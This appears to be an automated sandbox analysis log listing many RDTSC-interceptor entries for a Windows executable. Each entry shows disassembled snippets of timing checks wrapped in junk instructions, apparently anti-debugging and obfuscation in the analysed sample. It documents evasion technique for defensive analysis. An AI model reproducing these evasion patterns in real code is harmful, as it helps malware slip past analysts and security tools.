Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CF321 second address: 8CF327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CF327 second address: 8CF32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CF32B second address: 8CF32F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CEC37 second address: 8CEC3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A47DA9 second address: A47DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CEh 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FDE8CE8B4C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A48070 second address: A4807F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4807F second address: A48095 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE8CE8B4C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnl 00007FDE8CE8B4C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A48095 second address: A48099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4831C second address: A48320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A48320 second address: A48342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E2h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FDE8C51D4D6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4848E second address: A48494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A48494 second address: A4849F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B6F5 second address: A4B763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDE8CE8B4C6h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FDE8CE8B4CDh 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 sub dword ptr [ebp+122D1C44h], edx 0x0000001e mov edi, dword ptr [ebp+122D2E7Fh] 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FDE8CE8B4C8h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 jng 00007FDE8CE8B4D0h 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 mov dword ptr [ebp+122D29FFh], eax 0x0000004f popad 0x00000050 push 44AD8AD5h 0x00000055 push eax 0x00000056 push edx 0x00000057 push edi 0x00000058 pushad 0x00000059 popad 0x0000005a pop edi 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B763 second address: A4B7E7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FDE8C51D4D6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 44AD8A55h 0x00000013 mov ch, al 0x00000015 mov dx, B259h 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FDE8C51D4D8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 push ebx 0x00000036 mov esi, 60F63800h 0x0000003b pop edx 0x0000003c mov dword ptr [ebp+122D29FFh], esi 0x00000042 push 00000000h 0x00000044 movzx edi, si 0x00000047 push 00000003h 0x00000049 call 00007FDE8C51D4DEh 0x0000004e mov si, 0CE2h 0x00000052 pop edx 0x00000053 or dword ptr [ebp+122D1CE0h], edx 0x00000059 push 85473414h 0x0000005e push eax 0x0000005f push edx 0x00000060 push edx 0x00000061 jmp 00007FDE8C51D4DEh 0x00000066 pop edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B7E7 second address: A4B7EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B8C3 second address: A4B8C9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B8C9 second address: A4B927 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FDE8CE8B4CAh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 293C2647h 0x00000012 mov dx, ax 0x00000015 push 00000003h 0x00000017 mov ecx, dword ptr [ebp+122D2C53h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007FDE8CE8B4C8h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 movzx ecx, di 0x0000003c push 00000003h 0x0000003e mov dx, A3DAh 0x00000042 call 00007FDE8CE8B4C9h 0x00000047 push eax 0x00000048 push edx 0x00000049 js 00007FDE8CE8B4CCh 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B927 second address: A4B92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B92B second address: A4B949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FDE8CE8B4CBh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B949 second address: A4B959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B959 second address: A4B9A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007FDE8CE8B4CDh 0x00000012 pop eax 0x00000013 lea ebx, dword ptr [ebp+12450591h] 0x00000019 mov dword ptr [ebp+122D2A94h], edx 0x0000001f xchg eax, ebx 0x00000020 jmp 00007FDE8CE8B4D4h 0x00000025 push eax 0x00000026 pushad 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BA32 second address: A4BA98 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDE8C51D4D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b add dword ptr [esp], 0C01D331h 0x00000012 adc edi, 4D17B527h 0x00000018 push 00000003h 0x0000001a mov si, ax 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FDE8C51D4D8h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 jmp 00007FDE8C51D4DAh 0x0000003e push 00000003h 0x00000040 push edx 0x00000041 add di, 19D3h 0x00000046 pop ecx 0x00000047 mov dword ptr [ebp+122D1C44h], ecx 0x0000004d push 495446F9h 0x00000052 jo 00007FDE8C51D4EBh 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BA98 second address: A4BAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CDh 0x00000009 popad 0x0000000a add dword ptr [esp], 76ABB907h 0x00000011 lea ebx, dword ptr [ebp+1245059Ch] 0x00000017 mov edi, dword ptr [ebp+122D2DDFh] 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jng 00007FDE8CE8B4C8h 0x00000026 push edx 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BAC8 second address: A4BACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BACE second address: A4BAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5C733 second address: A5C738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A68F7F second address: A68F85 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A690FE second address: A69103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69292 second address: A692C5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDE8CE8B4D0h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FDE8CE8B4CFh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A692C5 second address: A692DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDE8C51D4E5h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6946B second address: A69471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69471 second address: A69477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69A14 second address: A69A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FDE8CE8B4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDE8CE8B4D2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69A34 second address: A69A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69BEA second address: A69BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69BF2 second address: A69C12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FDE8C51D4E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69E7B second address: A69E8A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE8CE8B4C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69E8A second address: A69E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69E91 second address: A69E96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69E96 second address: A69EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4E4h 0x00000009 js 00007FDE8C51D4D6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69EB9 second address: A69EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A019 second address: A6A022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A022 second address: A6A026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38AC4 second address: A38AD0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38AD0 second address: A38AEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDE8CE8B4D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A960 second address: A6A968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A968 second address: A6A977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jo 00007FDE8CE8B4CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6AC03 second address: A6AC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6AC09 second address: A6AC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FDE8CE8B4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6AC15 second address: A6AC21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FDE8C51D4D6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A71D0E second address: A71D18 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE8CE8B4CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75069 second address: A7508C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FDE8C51D4D6h 0x0000000c jmp 00007FDE8C51D4E6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7508C second address: A75096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FDE8CE8B4C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75096 second address: A750E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jg 00007FDE8C51D4D6h 0x00000010 jmp 00007FDE8C51D4E9h 0x00000015 pop ebx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push edi 0x0000001e pop edi 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A750E0 second address: A750E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A750E4 second address: A750EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A750EA second address: A750F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FDE8CE8B4C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A750F4 second address: A750F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7596B second address: A75991 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnl 00007FDE8CE8B4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007FDE8CE8B4D8h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3C058 second address: A3C05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3C05E second address: A3C064 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3C064 second address: A3C069 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7B05D second address: A7B061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7BE13 second address: A7BE17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C47E second address: A7C488 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C637 second address: A7C63B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C63B second address: A7C641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7CD67 second address: A7CD6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7E00D second address: A7E02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7E02C second address: A7E030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7F34D second address: A7F362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CCh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7FE1C second address: A7FE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FDE8C51D4EDh 0x0000000b jmp 00007FDE8C51D4E7h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FDE8C51D4D8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 jmp 00007FDE8C51D4E1h 0x00000035 push 00000000h 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A80836 second address: A80856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FDE8CE8B4D4h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A80856 second address: A8085B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8085B second address: A80866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FDE8CE8B4C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7FBEA second address: A7FBF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7FBF0 second address: A7FBFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FDE8CE8B4C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7FBFB second address: A7FC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A85173 second address: A85179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A85C75 second address: A85C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8C51D4DBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A88295 second address: A88301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FDE8CE8B4C8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jmp 00007FDE8CE8B4CCh 0x00000027 sbb bx, 0ED0h 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D2A94h], eax 0x00000034 push 00000000h 0x00000036 mov edi, dword ptr [ebp+1247340Eh] 0x0000003c xor edi, 773260E7h 0x00000042 xchg eax, esi 0x00000043 jmp 00007FDE8CE8B4CFh 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FDE8CE8B4CAh 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86359 second address: A8635D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8635D second address: A8637C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE8CE8B4CCh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnc 00007FDE8CE8B4C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A567 second address: A8A56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8637C second address: A86381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B286 second address: A8B29F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE8C51D4DFh 0x0000000f rdtsc
